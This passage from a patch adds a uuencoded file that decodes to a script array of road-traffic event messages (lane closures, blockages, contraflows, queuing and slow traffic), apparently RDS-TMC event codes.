+M9"(["B`@("`D179E;G1;-#8X72`@/2`B;65S<V%G92!C86YC96QL960B.PH@
+M("`@)$5V96YT6S0V.5T@(#T@(F-L;W-E9"!A:&5A9"(["B`@("`D179E;G1;
+M-#<P72`@/2`B8FQO8VME9"!A:&5A9"(["B`@("`D179E;G1;-#<Q72`@/2`B
+M*%$I(&5N=')Y('-L:7`@<F]A9"AS*2!C;&]S960B.PH@("`@)$5V96YT6S0W
+M,ET@(#T@(BA1('1H*2!E;G1R>2!S;&EP(')O860@8FQO8VME9"(["B`@("`D
+M179E;G1;-#<S72`@/2`B96YT<GD@8FQO8VME9"(["B`@("`D179E;G1;-#<T
+M72`@/2`B*%$I(&5X:70@<VQI<"!R;V%D*',I(&-L;W-E9"(["B`@("`D179E
+M;G1;-#<U72`@/2`B*%$@=&@I(&5X:70@<VQI<"!R;V%D(&)L;V-K960B.PH@
+M("`@)$5V96YT6S0W-ET@(#T@(F5X:70@8FQO8VME9"(["B`@("`D179E;G1;
+M-#<W72`@/2`B<VQI<"!R;V%D<R!B;&]C:V5D(CL*("`@("1%=F5N=%LT-SA=
+M("`](")C;VYN96-T:6YG(&-A<G)I86=E=V%Y(&-L;W-E9"(["B`@("`D179E
+M;G1;-#<Y72`@/2`B<&%R86QL96P@8V%R<FEA9V5W87D@8VQO<V5D(CL*("`@
+M("1%=F5N=%LT.#!=("`](")R:6=H="UH86YD('!A<F%L;&5L(&-A<G)I86=E
+M=V%Y(&-L;W-E9"(["B`@("`D179E;G1;-#@Q72`@/2`B;&5F="UH86YD('!A
+M<F%L;&5L(&-A<G)I86=E=V%Y(&-L;W-E9"(["B`@("`D179E;G1;-#@R72`@
+M/2`B97AP<F5S<R!L86YE<R!C;&]S960B.PH@("`@)$5V96YT6S0X,UT@(#T@
+M(G1H<F]U9V@@=')A9F9I8R!L86YE<R!C;&]S960B.PH@("`@)$5V96YT6S0X
+M-%T@(#T@(FQO8V%L(&QA;F5S(&-L;W-E9"(["B`@("`D179E;G1;-#@U72`@
+M/2`B8V]N;F5C=&EN9R!C87)R:6%G97=A>2!B;&]C:V5D(CL*("`@("1%=F5N
+M=%LT.#9=("`](")P87)A;&QE;"!C87)R:6%G97=A>2!B;&]C:V5D(CL*("`@
+M("1%=F5N=%LT.#==("`](")R:6=H="UH86YD('!A<F%L;&5L(&-A<G)I86=E
+M=V%Y(&)L;V-K960B.PH@("`@)$5V96YT6S0X.%T@(#T@(FQE9G0M:&%N9"!P
+M87)A;&QE;"!C87)R:6%G97=A>2!B;&]C:V5D(CL*("`@("1%=F5N=%LT.#E=
+M("`](")E>'!R97-S(&QA;F5S(&)L;V-K960B.PH@("`@)$5V96YT6S0Y,%T@
+M(#T@(G1H<F]U9V@@=')A9F9I8R!L86YE<R!B;&]C:V5D(CL*("`@("1%=F5N
+M=%LT.3%=("`](")L;V-A;"!L86YE<R!B;&]C:V5D(CL*("`@("1%=F5N=%LT
+M.3)=("`](")N;R!M;W1O<B!V96AI8VQE<R(["B`@("`D179E;G1;-#DS72`@
+M/2`B<F5S=')I8W1I;VYS(CL*("`@("1%=F5N=%LT.31=("`](")C;&]S960@
+M9F]R(&AE879Y(&QO<G)I97,@*&]V97(@42DB.PH@("`@)$5V96YT6S0Y-5T@
+M(#T@(F-L;W-E9"!A:&5A9"X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2([
+M"B`@("`D179E;G1;-#DV72`@/2`B8VQO<V5D(&%H96%D+B!1=65U:6YG('1R
+M869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT.3==("`](")C;&]S960@86AE
+M860N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S0Y.%T@(#T@
+M(F)L;V-K960@86AE860N(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@
+M("`@)$5V96YT6S0Y.5T@(#T@(F)L;V-K960@86AE860N(%%U975I;F<@=')A
+M9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S4P,%T@(#T@(BA1*2!L86YE*',I
+M(&-L;W-E9"(["B`@("`D179E;G1;-3`Q72`@/2`B*%$I(')I9VAT(&QA;F4H
+M<RD@8VQO<V5D(CL*("`@("1%=F5N=%LU,#)=("`]("(H42D@8V5N=')E(&QA
+M;F4H<RD@8VQO<V5D(CL*("`@("1%=F5N=%LU,#-=("`]("(H42D@;&5F="!L
+M86YE*',I(&-L;W-E9"(["B`@("`D179E;G1;-3`T72`@/2`B:&%R9"!S:&]U
+M;&1E<B!C;&]S960B.PH@("`@)$5V96YT6S4P-5T@(#T@(G1W;R!L86YE<R!C
+M;&]S960B.PH@("`@)$5V96YT6S4P-ET@(#T@(G1H<F5E(&QA;F5S(&-L;W-E
+M9"(["B`@("`D179E;G1;-3`W72`@/2`B*%$I(')I9VAT(&QA;F4H<RD@8FQO
+M8VME9"(["B`@("`D179E;G1;-3`X72`@/2`B*%$I(&-E;G1R92!L86YE*',I
+M(&)L;V-K960B.PH@("`@)$5V96YT6S4P.5T@(#T@(BA1*2!L969T(&QA;F4H
+M<RD@8FQO8VME9"(["B`@("`D179E;G1;-3$P72`@/2`B:&%R9"!S:&]U;&1E
+M<B!B;&]C:V5D(CL*("`@("1%=F5N=%LU,3%=("`](")T=V\@;&%N97,@8FQO
+M8VME9"(["B`@("`D179E;G1;-3$R72`@/2`B=&AR964@;&%N97,@8FQO8VME
+M9"(["B`@("`D179E;G1;-3$S72`@/2`B<VEN9VQE(&%L=&5R;F%T92!L:6YE
+M('1R869F:6,B.PH@("`@)$5V96YT6S4Q-%T@(#T@(F-A<G)I86=E=V%Y(')E
+M9'5C960@*&9R;VT@42!L86YE<RD@=&\@;VYE(&QA;F4B.PH@("`@)$5V96YT
+M6S4Q-5T@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@
+M=&\@='=O(&QA;F5S(CL*("`@("1%=F5N=%LU,39=("`](")C87)R:6%G97=A
+M>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O('1H<F5E(&QA;F5S(CL*("`@
+M("1%=F5N=%LU,3==("`](")C;VYT<F%F;&]W(CL*("`@("1%=F5N=%LU,3A=
+M("`](")N87)R;W<@;&%N97,B.PH@("`@)$5V96YT6S4Q.5T@(#T@(F-O;G1R
+M869L;W<@=VET:"!N87)R;W<@;&%N97,B.PH@("`@)$5V96YT6S4R,%T@(#T@
+M(BA1*2!L86YE*',I(&)L;V-K960B.PH@("`@)$5V96YT6S4R,5T@(#T@(BA1
+M*2!L86YE<R!C;&]S960N(%-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E
+M;G1;-3(R72`@/2`B*%$I(&QA;F5S(&-L;W-E9"X@4W1A=&EO;F%R>2!T<F%F
+M9FEC(&9O<B!K;2(["B`@("`D179E;G1;-3(S72`@/2`B*%$I(&QA;F5S(&-L
+M;W-E9"X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;
+M-3(T72`@/2`B*%$I(&QA;F5S(&-L;W-E9"X@4W1A=&EO;F%R>2!T<F%F9FEC
+M(&9O<B!K;2(["B`@("`D179E;G1;-3(U72`@/2`B*%$I(&QA;F5S(&-L;W-E
+M9"X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-3(V
+M72`@/2`B*%$I(&QA;F5S(&-L;W-E9"X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O
+M<B!K;2(["B`@("`D179E;G1;-3(W72`@/2`B*%$I(&QA;F5S(&-L;W-E9"X@
+M1&%N9V5R(&]F('-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;-3(X
+M72`@/2`B*%$I(&QA;F5S(&-L;W-E9"X@475E=6EN9R!T<F%F9FEC(CL*("`@
+M("1%=F5N=%LU,CE=("`]("(H42D@;&%N97,@8VQO<V5D+B!1=65U:6YG('1R
+M869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LU,S!=("`]("(H42D@;&%N97,@
+M8VQO<V5D+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LU
+M,S%=("`]("(H42D@;&%N97,@8VQO<V5D+B!1=65U:6YG('1R869F:6,@9F]R
+M(&MM(CL*("`@("1%=F5N=%LU,S)=("`]("(H42D@;&%N97,@8VQO<V5D+B!1
+M=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LU,S-=("`]("(H
+M42D@;&%N97,@8VQO<V5D+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@
+M("1%=F5N=%LU,S1=("`]("(H42D@;&%N97,@8VQO<V5D+B!$86YG97(@;V8@
+M<75E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LU,S5=("`]("(H42D@;&%N
+M97,@8VQO<V5D+B!3;&]W('1R869F:6,B.PH@("`@)$5V96YT6S4S-ET@(#T@
+M(BA1*2!L86YE<R!C;&]S960N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@
+M)$5V96YT6S4S-UT@(#T@(BA1*2!L86YE<R!C;&]S960N(%-L;W<@=')A9F9I
+M8R!F;W(@:VTB.PH@("`@)$5V96YT6S4S.%T@(#T@(BA1*2!L86YE<R!C;&]S
+M960N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S4S.5T@(#T@
+M(BA1*2!L86YE<R!C;&]S960N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@
+M)$5V96YT6S4T,%T@(#T@(BA1*2!L86YE<R!C;&]S960N(%-L;W<@=')A9F9I
+M8R!F;W(@:VTB.PH@("`@)$5V96YT6S4T,5T@(#T@(BA1*2!L86YE<R!C;&]S
+M960N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;-30R72`@
+M/2`B*%$I(&QA;F5S(&-L;W-E9"X@2&5A=GD@=')A9F9I8R(["B`@("`D179E
+M;G1;-30S72`@/2`B*%$I(&QA;F5S(&-L;W-E9"X@2&5A=GD@=')A9F9I8R!E
+M>'!E8W1E9"(["B`@("`D179E;G1;-30T72`@/2`B*%$I;&%N97,@8VQO<V5D
+M+B!4<F%F9FEC(&9L;W=I;F<@9G)E96QY(CL*("`@("1%=F5N=%LU-#5=("`]
+M("(H42EL86YE<R!C;&]S960N(%1R869F:6,@8G5I;&1I;F<@=7`B.PH@("`@
+M)$5V96YT6S4T-ET@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L
+M86YE<RD@=&\@;VYE(&QA;F4N(%-T871I;VYA<GD@=')A9F9I8R(["B`@("`D
+M179E;G1;-30W72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O;2!1(&QA
+M;F5S*2!T;R!O;F4@;&%N92X@1&%N9V5R(&]F('-T871I;VYA<GD@=')A9F9I
+M8R(["B`@("`D179E;G1;-30X72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H
+M9G)O;2!1(&QA;F5S*2!T;R!O;F4@;&%N92X@475E=6EN9R!T<F%F9FEC(CL*
+M("`@("1%=F5N=%LU-#E=("`](")C87)R:6%G97=A>2!R961U8V5D("AF<F]M
+M(%$@;&%N97,I('1O(&]N92!L86YE+B!$86YG97(@;V8@<75E=6EN9R!T<F%F
+M9FEC(CL*("`@("1%=F5N=%LU-3!=("`](")C87)R:6%G97=A>2!R961U8V5D
+M("AF<F]M(%$@;&%N97,I('1O(&]N92!L86YE+B!3;&]W('1R869F:6,B.PH@
+M("`@)$5V96YT6S4U,5T@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@
+M42!L86YE<RD@=&\@;VYE(&QA;F4N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"([
+M"B`@("`D179E;G1;-34R72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O
+M;2!1(&QA;F5S*2!T;R!O;F4@;&%N92X@2&5A=GD@=')A9F9I8R(["B`@("`D
+M179E;G1;-34S72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O;2!1(&QA
+M;F5S*2!T;R!O;F4@;&%N92X@2&5A=GD@=')A9F9I8R!E>'!E8W1E9"(["B`@
+M("`D179E;G1;-34T72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O;2!1
+M(&QA;F5S*2!T;R!O;F4@;&%N92X@5')A9F9I8R!F;&]W:6YG(&9R965L>2([
+M"B`@("`D179E;G1;-34U72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O
+M;2!1(&QA;F5S*2!T;R!O;F4@;&%N92X@5')A9F9I8R!B=6EL9&EN9R!U<"([
+M"B`@("`D179E;G1;-34V72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O
+M;2!1(&QA;F5S*2!T;R!T=V\@;&%N97,N(%-T871I;VYA<GD@=')A9F9I8R([
+M"B`@("`D179E;G1;-34W72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O
+M;2!1(&QA;F5S*2!T;R!T=V\@;&%N97,N($1A;F=E<B!O9B!S=&%T:6]N87)Y
+M('1R869F:2(["B`@("`D179E;G1;-34X72`@/2`B8V%R<FEA9V5W87D@<F5D
+M=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!T=V\@;&%N97,N(%%U975I;F<@=')A
+M9F9I8R(["B`@("`D179E;G1;-34Y72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E
+M9"`H9G)O;2!1(&QA;F5S*2!T;R!T=V\@;&%N97,N($1A;F=E<B!O9B!Q=65U
+M:6YG('1R869F:6,B.PH@("`@)$5V96YT6S4V,%T@(#T@(F-A<G)I86=E=V%Y
+M(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@='=O(&QA;F5S+B!3;&]W('1R
+M869F:6,B.PH@("`@)$5V96YT6S4V,5T@(#T@(F-A<G)I86=E=V%Y(')E9'5C
+M960@*&9R;VT@42!L86YE<RD@=&\@='=O(&QA;F5S+B!3;&]W('1R869F:6,@
+M97AP96-T960B.PH@("`@)$5V96YT6S4V,ET@(#T@(F-A<G)I86=E=V%Y(')E
+M9'5C960@*&9R;VT@42!L86YE<RD@=&\@='=O(&QA;F5S+B!(96%V>2!T<F%F
+M9FEC(CL*("`@("1%=F5N=%LU-C-=("`](")C87)R:6%G97=A>2!R961U8V5D
+M("AF<F]M(%$@;&%N97,I('1O('1W;R!L86YE<RX@2&5A=GD@=')A9F9I8R!E
+M>'!E8W1E9"(["B`@("`D179E;G1;-38T72`@/2`B8V%R<FEA9V5W87D@<F5D
+M=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!T=V\@;&%N97,N(%1R869F:6,@9FQO
+M=VEN9R!F<F5E;'DB.PH@("`@)$5V96YT6S4V-5T@(#T@(F-A<G)I86=E=V%Y
+M(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@='=O(&QA;F5S+B!4<F%F9FEC
+M(&)U:6QD:6YG('5P(CL*("`@("1%=F5N=%LU-C9=("`](")C87)R:6%G97=A
+M>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O('1H<F5E(&QA;F5S+B!3=&%T
+M:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S4V-UT@(#T@(F-A<G)I86=E
+M=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@=&AR964@;&%N97,N($1A
+M;F=E<B!O9B!S=&%T:6]N87)Y('1R868B.PH@("`@)$5V96YT6S4V.%T@(#T@
+M(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@=&AR964@
+M;&%N97,N(%%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;-38Y72`@/2`B
+M8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!T:')E92!L
+M86YE<RX@1&%N9V5R(&]F('%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;
+M-3<P72`@/2`B8V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O;2!1(&QA;F5S*2!T
+M;R!T:')E92!L86YE<RX@4VQO=R!T<F%F9FEC(CL*("`@("1%=F5N=%LU-S%=
+M("`](")C87)R:6%G97=A>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O('1H
+M<F5E(&QA;F5S+B!3;&]W('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT
+M6S4W,ET@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@
+M=&\@=&AR964@;&%N97,N($AE879Y('1R869F:6,B.PH@("`@)$5V96YT6S4W
+M,UT@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@
+M=&AR964@;&%N97,N($AE879Y('1R869F:6,@97AP96-T960B.PH@("`@)$5V
+M96YT6S4W-%T@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE
+M<RD@=&\@=&AR964@;&%N97,N(%1R869F:6,@9FQO=VEN9R!F<F5E;'DB.PH@
+M("`@)$5V96YT6S4W-5T@(#T@(F-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@
+M42!L86YE<RD@=&\@=&AR964@;&%N97,N(%1R869F:6,@8G5I;&1I;F<@=7`B
+M.PH@("`@)$5V96YT6S4W-ET@(#T@(F-O;G1R869L;W<N(%-T871I;VYA<GD@
+M=')A9F9I8R(["B`@("`D179E;G1;-3<W72`@/2`B8V]N=')A9FQO=RX@4W1A
+M=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-3<X72`@/2`B
+M8V]N=')A9FQO=RX@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D
+M179E;G1;-3<Y72`@/2`B8V]N=')A9FQO=RX@4W1A=&EO;F%R>2!T<F%F9FEC
+M(&9O<B!K;2(["B`@("`D179E;G1;-3@P72`@/2`B8V]N=')A9FQO=RX@4W1A
+M=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-3@Q72`@/2`B
+M8V]N=')A9FQO=RX@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D
+M179E;G1;-3@R72`@/2`B8V]N=')A9FQO=RX@1&%N9V5R(&]F('-T871I;VYA
+M<GD@=')A9F9I8R(["B`@("`D179E;G1;-3@S72`@/2`B8V]N=')A9FQO=RX@
+M475E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LU.#1=("`](")C;VYT<F%F
+M;&]W+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LU.#5=
+M("`](")C;VYT<F%F;&]W+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@
+M("1%=F5N=%LU.#9=("`](")C;VYT<F%F;&]W+B!1=65U:6YG('1R869F:6,@
+M9F]R(&MM(CL*("`@("1%=F5N=%LU.#==("`](")C;VYT<F%F;&]W+B!1=65U
+M:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LU.#A=("`](")C;VYT
+M<F%F;&]W+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LU
+M.#E=("`](")C;VYT<F%F;&]W+B!$86YG97(@;V8@<75E=6EN9R!T<F%F9FEC
+M(CL*("`@("1%=F5N=%LU.3!=("`](")C;VYT<F%F;&]W+B!3;&]W('1R869F
+M:6,B.PH@("`@)$5V96YT6S4Y,5T@(#T@(F-O;G1R869L;W<N(%-L;W<@=')A
+M9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S4Y,ET@(#T@(F-O;G1R869L;W<N
+M(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S4Y,UT@(#T@(F-O
+M;G1R869L;W<N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S4Y
+M-%T@(#T@(F-O;G1R869L;W<N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@
+M)$5V96YT6S4Y-5T@(#T@(F-O;G1R869L;W<N(%-L;W<@=')A9F9I8R!F;W(@
+M:VTB.PH@("`@)$5V96YT6S4Y-ET@(#T@(F-O;G1R869L;W<N(%-L;W<@=')A
+M9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;-3DW72`@/2`B8V]N=')A9FQO
+M=RX@2&5A=GD@=')A9F9I8R(["B`@("`D179E;G1;-3DX72`@/2`B8V]N=')A
+M9FQO=RX@2&5A=GD@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;-3DY
+M72`@/2`B8V]N=')A9FQO=RX@5')A9F9I8R!F;&]W:6YG(&9R965L>2(["B`@
+M("`D179E;G1;-C`P72`@/2`B8V]N=')A9FQO=RX@5')A9F9I8R!B=6EL9&EN
+M9R!U<"(["B`@("`D179E;G1;-C`Q72`@/2`B8V]N=')A9FQO=RX@0V%R<FEA
+M9V5W87D@<F5D=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!O;F4@;&%N92(["B`@
+M("`D179E;G1;-C`R72`@/2`B8V]N=')A9FQO=RX@0V%R<FEA9V5W87D@<F5D
+M=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!T=V\@;&%N97,B.PH@("`@)$5V96YT
+M6S8P,UT@(#T@(F-O;G1R869L;W<N($-A<G)I86=E=V%Y(')E9'5C960@*&9R
+M;VT@42!L86YE<RD@=&\@=&AR964@;&%N97,B.PH@("`@)$5V96YT6S8P-%T@
+M(#T@(FYA<G)O=R!L86YE<RX@4W1A=&EO;F%R>2!T<F%F9FEC(CL*("`@("1%
+M=F5N=%LV,#5=("`](")N87)R;W<@;&%N97,N($1A;F=E<B!O9B!S=&%T:6]N
+M87)Y('1R869F:6,B.PH@("`@)$5V96YT6S8P-ET@(#T@(FYA<G)O=R!L86YE
+M<RX@475E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LV,#==("`](")N87)R
+M;W<@;&%N97,N($1A;F=E<B!O9B!Q=65U:6YG('1R869F:6,B.PH@("`@)$5V
+M96YT6S8P.%T@(#T@(FYA<G)O=R!L86YE<RX@4VQO=R!T<F%F9FEC(CL*("`@
+M("1%=F5N=%LV,#E=("`](")N87)R;W<@;&%N97,N(%-L;W<@=')A9F9I8R!E
+M>'!E8W1E9"(["B`@("`D179E;G1;-C$P72`@/2`B;F%R<F]W(&QA;F5S+B!(
+M96%V>2!T<F%F9FEC(CL*("`@("1%=F5N=%LV,3%=("`](")N87)R;W<@;&%N
+M97,N($AE879Y('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT6S8Q,ET@
+M(#T@(FYA<G)O=R!L86YE<RX@5')A9F9I8R!F;&]W:6YG(&9R965L>2(["B`@
+M("`D179E;G1;-C$S72`@/2`B;F%R<F]W(&QA;F5S+B!4<F%F9FEC(&)U:6QD
+M:6YG('5P(CL*("`@("1%=F5N=%LV,31=("`](")C;VYT<F%F;&]W('=I=&@@
+M;F%R<F]W(&QA;F5S+B!3=&%T:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT
+M6S8Q-5T@(#T@(F-O;G1R869L;W<@=VET:"!N87)R;W<@;&%N97,N(%-T871I
+M;VYA<GD@=')A9F9I8RX@1&%N9V5R(&]F('-T871I;VYA<GD@=')A9F9I8R([
+M"B`@("`D179E;G1;-C$V72`@/2`B8V]N=')A9FQO=R!W:71H(&YA<G)O=R!L
+M86YE<RX@475E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LV,3==("`](")C
+M;VYT<F%F;&]W('=I=&@@;F%R<F]W(&QA;F5S+B!$86YG97(@;V8@<75E=6EN
+M9R!T<F%F9FEC(CL*("`@("1%=F5N=%LV,3A=("`](")C;VYT<F%F;&]W('=I
+M=&@@;F%R<F]W(&QA;F5S+B!3;&]W('1R869F:6,B.PH@("`@)$5V96YT6S8Q
+M.5T@(#T@(F-O;G1R869L;W<@=VET:"!N87)R;W<@;&%N97,N(%-L;W<@=')A
+M9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;-C(P72`@/2`B8V]N=')A9FQO
+M=R!W:71H(&YA<G)O=R!L86YE<RX@2&5A=GD@=')A9F9I8R(["B`@("`D179E
+M;G1;-C(Q72`@/2`B8V]N=')A9FQO=R!W:71H(&YA<G)O=R!L86YE<RX@2&5A
+M=GD@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;-C(R72`@/2`B8V]N
+M=')A9FQO=R!W:71H(&YA<G)O=R!L86YE<RX@5')A9F9I8R!F;&]W:6YG(&9R
+M965L>2(["B`@("`D179E;G1;-C(S72`@/2`B8V]N=')A9FQO=R!W:71H(&YA
+M<G)O=R!L86YE<RX@5')A9F9I8R!B=6EL9&EN9R!U<"(["B`@("`D179E;G1;
+M-C(T72`@/2`B;&%N92!C;&]S=7)E<R!R96UO=F5D(CL*("`@("1%=F5N=%LV
+M,C5=("`](")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;-C(V72`@
+M/2`B8FQO8VME9"!A:&5A9"X@4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D
+M179E;G1;-C(W72`@/2`B;F\@;6]T;W(@=F5H:6-L97,@=VET:&]U="!C871A
+M;'ET:6,@8V]N=F5R=&5R<R(["B`@("`D179E;G1;-C(X72`@/2`B;F\@;6]T
+M;W(@=F5H:6-L97,@=VET:"!E=F5N+6YU;6)E<F5D(')E9VES=')A=&EO;B!P
+M;&%T97,B.PH@("`@)$5V96YT6S8R.5T@(#T@(FYO(&UO=&]R('9E:&EC;&5S
+M('=I=&@@;V1D+6YU;6)E<F5D(')E9VES=')A=&EO;B!P;&%T97,B.PH@("`@
+M)$5V96YT6S8S,%T@(#T@(F]P96XB.PH@("`@)$5V96YT6S8S,5T@(#T@(G)O
+M860@8VQE87)E9"(["B`@("`D179E;G1;-C,R72`@/2`B96YT<GD@<F5O<&5N
+M960B.PH@("`@)$5V96YT6S8S,UT@(#T@(F5X:70@<F5O<&5N960B.PH@("`@
+M)$5V96YT6S8S-%T@(#T@(F%L;"!C87)R:6%G97=A>7,@<F5O<&5N960B.PH@
+M("`@)$5V96YT6S8S-5T@(#T@(FUO=&]R('9E:&EC;&4@<F5S=')I8W1I;VYS
+M(&QI9G1E9"(["B`@("`D179E;G1;-C,V72`@/2`B=')A9F9I8R!R97-T<FEC
+M=&EO;G,@;&EF=&5D('MR96]P96YE9"!F;W(@86QL('1R869F:6-](CL*("`@
+M("1%=F5N=%LV,S==("`](")E;65R9V5N8WD@;&%N92!C;&]S960B.PH@("`@
+M)$5V96YT6S8S.%T@(#T@(G1U<FYI;F<@;&%N92!C;&]S960B.PH@("`@)$5V
+M96YT6S8S.5T@(#T@(F-R87=L97(@;&%N92!C;&]S960B.PH@("`@)$5V96YT
+M6S8T,%T@(#T@(G-L;W<@=F5H:6-L92!L86YE(&-L;W-E9"(["B`@("`D179E
+M;G1;-C0Q72`@/2`B;VYE(&QA;F4@8VQO<V5D(CL*("`@("1%=F5N=%LV-#)=
+M("`](")E;65R9V5N8WD@;&%N92!B;&]C:V5D(CL*("`@("1%=F5N=%LV-#-=
+M("`](")T=7)N:6YG(&QA;F4@8FQO8VME9"(["B`@("`D179E;G1;-C0T72`@
+M/2`B8W)A=VQE<B!L86YE(&)L;V-K960B.PH@("`@)$5V96YT6S8T-5T@(#T@
+M(G-L;W<@=F5H:6-L92!L86YE(&)L;V-K960B.PH@("`@)$5V96YT6S8T-ET@
+M(#T@(F]N92!L86YE(&)L;V-K960B.PH@("`@)$5V96YT6S8T-UT@(#T@(BA1
+M('!E<G-O;BD@8V%R<&]O;"!L86YE(&EN(&]P97)A=&EO;B(["B`@("`D179E
+M;G1;-C0X72`@/2`B*%$@<&5R<V]N*2!C87)P;V]L(&QA;F4@8VQO<V5D(CL*
+M("`@("1%=F5N=%LV-#E=("`]("(H42!P97)S;VXI(&-A<G!O;VP@;&%N92!B
+M;&]C:V5D(CL*("`@("1%=F5N=%LV-3!=("`](")C87)P;V]L(')E<W1R:6-T
+M:6]N<R!C:&%N9V5D("AT;R!1('!E<G-O;G,@<&5R('9E:&EC;&4I(CL*("`@
+M("1%=F5N=%LV-3%=("`]("(H42D@;&%N97,@8VQO<V5D+B!3=&%T:6]N87)Y
+M('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LV-3)=("`]("(H42D@;&%N
+M97,@8VQO<V5D+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N
+M=%LV-3-=("`]("(H42D@;&%N97,@8VQO<V5D+B!3;&]W('1R869F:6,@9F]R
+M(&MM(CL*("`@("1%=F5N=%LV-31=("`](")C;VYT<F%F;&]W+B!3=&%T:6]N
+M87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LV-35=("`](")C;VYT
+M<F%F;&]W+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LV
+M-39=("`](")C;VYT<F%F;&]W+B!3;&]W('1R869F:6,@9F]R(&MM(CL*("`@
+M("1%=F5N=%LV-3==("`](")L86YE(&)L;V-K86=E<R!C;&5A<F5D(CL*("`@
+M("1%=F5N=%LV-3A=("`](")C;VYT<F%F;&]W(')E;6]V960B.PH@("`@)$5V
+M96YT6S8U.5T@(#T@(BA1('!E<G-O;BD@8V%R<&]O;"!R97-T<FEC=&EO;G,@
+M;&EF=&5D(CL*("`@("1%=F5N=%LV-C!=("`](")L86YE(')E<W1R:6-T:6]N
+M<R!L:69T960B.PH@("`@)$5V96YT6S8V,5T@(#T@(G5S92!O9B!H87)D('-H
